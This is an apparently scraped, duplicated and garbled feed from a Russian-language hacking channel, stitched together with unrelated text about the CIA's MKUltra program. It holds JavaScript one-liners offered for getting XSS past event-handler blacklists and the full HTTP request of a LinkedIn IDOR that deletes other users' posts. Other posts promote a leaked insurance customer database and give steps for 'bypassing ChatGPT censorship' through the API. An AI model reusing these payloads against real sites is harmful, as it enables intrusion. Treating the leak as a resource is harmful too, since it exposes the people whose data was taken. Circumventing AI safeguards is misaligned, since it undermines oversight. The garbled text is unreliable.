https://www.perimeterx.com/tech-blog/2019/list-every-event-that-exists-in-the-browser/
Проще всего так
Проще всего так
Object.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');})
ТакObject.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(window))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');}).filter(function(elem, pos, self){return self.indexOf(elem) == pos;})
Или так[...new Set([Поможет для эксплуатации xss'ок на случай, если сервис использует блэклисты на определенные эвент хэндлеры.
...Object.getOwnPropertyNames(document),
...Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document))),
...Object.getOwnPropertyNames(Object.getPrototypeOf(window)),
].filter(k => k.startsWith("on") && (document[k] == null || typeof document[k] == "function")))];
HUMAN Security
Blog | HUMAN Security
Check out the latest HUMAN Blogs for expert insights and industry expertise on digital threats.
Две недели назад дисклоузнули уязвимость, которая позволяла удалить любой чужой пост на LinkedIn.
IDOR оценили в $10,000.
POST /mwlite/feed/deletePost/?csrfToken=ajax:6083619284478736796 HTTP/1.1где
Host: www.linkedin.com
{"objectUrn":"urn:li:activity:6390481093803499520"}
objectUrn — ID чужого поста.IDOR оценили в $10,000.
https://github.com/quarkslab/pastis
The PASTIS project is a fuzzing framework aiming at combining various software testing techniques within the same workflow to perform collaborative fuzzing also called ensemble fuzzing. At the moment it supports the following fuzzing engines:
— Honggfuzz (greybox fuzzer)
— AFL++ (greybox fuzzer)
— TritonDSE (whitebox fuzzer)
The PASTIS project is a fuzzing framework aiming at combining various software testing techniques within the same workflow to perform collaborative fuzzing also called ensemble fuzzing. At the moment it supports the following fuzzing engines:
— Honggfuzz (greybox fuzzer)
— AFL++ (greybox fuzzer)
— TritonDSE (whitebox fuzzer)
GitHub
GitHub - quarkslab/pastis: PASTIS: Collaborative Fuzzing Framework
PASTIS: Collaborative Fuzzing Framework. Contribute to quarkslab/pastis development by creating an account on GitHub.
Cybred
Две недели назад дисклоузнули уязвимость, которая позволяла удалить любой чужой пост на LinkedIn. POST /mwlite/feed/deletePost/?csrfToken=ajax:6083619284478736796 HTTP/1.1 Host: www.linkedin.com {"objectUrn":"urn:li:activity:6390481093803499520"} где objectUrn…
chatgpt-for-bugbounty-.pdf
1.1 MB
Наверстываем
Обход цензуры ChatGPT с помощью запросов к API.
1. Устанавливаем jq
2. Указываем в переменные окружения CHATGPT_TOKEN отсюда https://platform.openai.com/account/api-keys
3. Пользуемся
1. Устанавливаем jq
2. Указываем в переменные окружения CHATGPT_TOKEN отсюда https://platform.openai.com/account/api-keys
3. Пользуемся
Репозиторий с огромным списком PoC'ов для многих CVE, начиная с 2008 года https://github.com/nomi-sec/PoC-in-GitHub.
Автонаполняемый, существует отдельный сайт https://poc-in-github.motikan2010.net/.
Автонаполняемый, существует отдельный сайт https://poc-in-github.motikan2010.net/.
GitHub
GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
📡 PoC auto collect from GitHub. ⚠️ Be careful Malware. - nomi-sec/PoC-in-GitHub
Утекшая база клиентов "Альфастрахования". Примечательна тем, что содержит много корпоративных учеток наносеков из Магнита, X5, Сбера и других "топовых" компаний. Всего в сливе более 1 миллиона строк с ФИО, телефонами, почтами и хешами паролей.
Недавнее интервью Бастерлорда (бывший партнер Revil, Avaddon и Lockbit) изданию The Record https://therecord.media/bassterlord-interview-hacker-initial-access-broker. Делится подробностями личной жизни, уходом из хакинга и планами на будущее.
In a sense, this book is the result of two historical accidents. The first “accident” is that of the thousands of pages of research conducted under the CIA’s decade-long MKULTRA program, to our knowledge, only two major research studies — Mulholland’s manuals — survived CIA Director Richard Helm’s order in 1973 to destroy all MKULTRA documents. Mulholland’s manuals are a rare piece of historical evidence that the CIA, in the 1950s, through MKULTRA, sought to understand and acquire unorthodox capabilities for potential use against the Soviet adversary and the worldwide Communist threat. The manuals and other declassified MKULTRA administrative materials further reveal that many of America’s leading scientists and private institutions willingly participated in secret programs they agreed were critical to the nation’s security.
The second “accident” was the authors’ discovery of the long-lost CIA manuals while conducting unrelated research in 2007. Although portions of the manuals had been previously described, referenced, or printed in part, we were unaware of the existence of a copy of the complete declassified work along with the original drawings and illustrations.
Project MKUltra was an illegal human experimentation program designed and undertaken by the U.S. Central Intelligence Agency, intended to develop procedures and identify drugs that could be used in interrogations to weaken individuals and force confessions through brainwashing and psychological torture. It began in 1953 and was halted in 1973. MKUltra used numerous methods to manipulate its subjects' mental states and brain functions, such as the covert administration of high doses of psychoactive drugs (especially LSD) and other chemicals without the subjects' consent, electroshocks, hypnosis, sensory deprivation, isolation, verbal and sexual abuse, and other forms of torture.
The second “accident” was the authors’ discovery of the long-lost CIA manuals while conducting unrelated research in 2007. Although portions of the manuals had been previously described, referenced, or printed in part, we were unaware of the existence of a copy of the complete declassified work along with the original drawings and illustrations.
Project MKUltra was an illegal human experimentation program designed and undertaken by the U.S. Central Intelligence Agency, intended to develop procedures and identify drugs that could be used in interrogations to weaken individuals and force confessions through brainwashing and psychological torture. It began in 1953 and was halted in 1973. MKUltra used numerous methods to manipulate its subjects' mental states and brain functions, such as the covert administration of high doses of psychoactive drugs (especially LSD) and other chemicals without the subjects' consent, electroshocks, hypnosis, sensory deprivation, isolation, verbal and sexual abuse, and other forms of torture.